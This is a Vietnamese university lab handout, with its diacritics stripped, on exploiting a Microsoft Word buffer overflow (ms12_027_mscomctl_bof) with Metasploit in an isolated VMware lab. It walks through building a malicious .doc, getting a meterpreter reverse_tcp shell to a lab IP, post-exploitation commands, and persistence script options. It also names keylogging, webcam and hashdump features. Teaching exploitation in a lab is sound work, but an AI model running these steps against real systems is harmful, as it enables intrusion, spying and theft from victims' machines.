Professional Documents
Culture Documents
AN TON H IU HNH
H NI, 2015
[Type text]
MC LC
MC LC ............................................................................................................... 2
-2-
THNG TIN CHUNG V BI THC HNH
Tn bi thc hnh: Khai thc l hng phn mm bng metasploit
Module:
S lng sinh vin cng thc hin: 01
a im thc hnh: Phng my
Yu cu:
Yu cu phn cng:
Mi sinh vin c b tr 01 my tnh vi cu hnh ti thiu: CPU 2.0 GHz,
RAM 2GB, HDD 50GB
Yu cu phn mm trn my:
VMware Worstation 9.0 tr ln
Cng c thc hnh:
My o VMware: Windows XP SP3, Kali Linux.
Microsoft Office 2007
Yu cu kt ni mng LAN: C
Yu cu kt ni mng Internet: Khng
Yu cu khc: my chiu, bng vit, bt/phn vit bng
Cng c c cung cp cng ti liu ny:
-3-
CHUN B BI THC HNH
i vi ging vin
Trc bui hc, ging vin (ngi hng dn thc hnh) cn kim tra s
ph hp ca iu kin thc t ca phng thc hnh vi cc yu cu ca bi thc
hnh.
Ngoi ra khng i hi g thm.
i vi sinh vin
Trc khi bt u thc hnh, cn to cc bn sao ca my o s dng.
ng thi xc nh v tr lu tr cc cng c ch ra trong phn yu cu.
-4-
PHN 1. KHAI THC L HNG PHN MM BNG METASPLOIT
Nh chng ta bit th trnh son tho vn bn ni ting nht v c s
dng ph bin nht hin nay chnh l Microsoft Word nm trong b cng c son
tho Microsoft Office ca hng phn mm Microsoft
Chnh iu ny khin Microsoft Word tr thnh 1 mi trng cho nhng
Hacker li dng c th tn cng , khai thc v nh cp nhngthng tin trn
my ca ngi dng khi ngi dng m mt vn bn c cha m c bn trong.
y l li trn b m c pht hin trong Microsoft Word . Vi li ny
khi ngi dng m ti liu Word s v tnh thc hin nhng on m c hi cho
php k tn cng c quyn iu khin h thng .
Cc ti liu ca Word c th c nhng vo cc ti liu khc trong b
cng c Microsoft Office nh l Excel,PowerPoint V vic m bt c mt ti
liu no c nhng ti liu Word cha m c th on m c cng vn s
c thc thi trn my ca nn nhn.
-5-
Bc 3: File c cha m c s khai thc l hng trn phn mm microsoft
word to mt ca hu cho php kt ni ngc vi my ca k tn cng, gip
cho k tn cng chim c quyn kim sot ca my nn nhn.
-6-
Mt trong nhng payload m cc hacker vn thng s dng chnh
l meterpreter v n gin l n kh pht hin, h tr rt nhiu ty chn trong qu
trnh khai thc my nn nhn nh : keylog, webcam, hasdump Trong tham s
command c s dng reverse_tcp l cho php qu trnh kt ni ngc v my ca
k tn cng. C th hiu mt cch n gin l my ca k tn cng s m sn mt
cng cng kt ni ch my victim kt ni vo.
msf exploit(ms12_027_mscomctl_bof) > set LHOST 192.168.121.128
msf exploit(ms12_027_mscomctl_bof) > exploit
msf exploit(ms12_027_mscomctl_bof) > cp /root/. msf4/local/
baithuchanh.doc /root/Desktop
-8-
M c c tim t my 192.168.121.128:4444 ti my
192.168.121.126:1048
Nh vy c 1 phin kt ni ti vi my ca nn nhn .
G getuid thy thng tin username, getinfo bit thng tin my, ls C:\
xem a, mkdir to th mc, ni chung k tn cng hon ton kim
xot c my nn nhn.
-9-
y ta thy mt s tham s quan trng:
-X khi ng cng h thng
-i khong thi lng nghe gia cc kt ni
-p cng kt ni
-r a ch ip ca my Attacker
- 10 -
Chy on scripts s dng msfconsole
- 11 -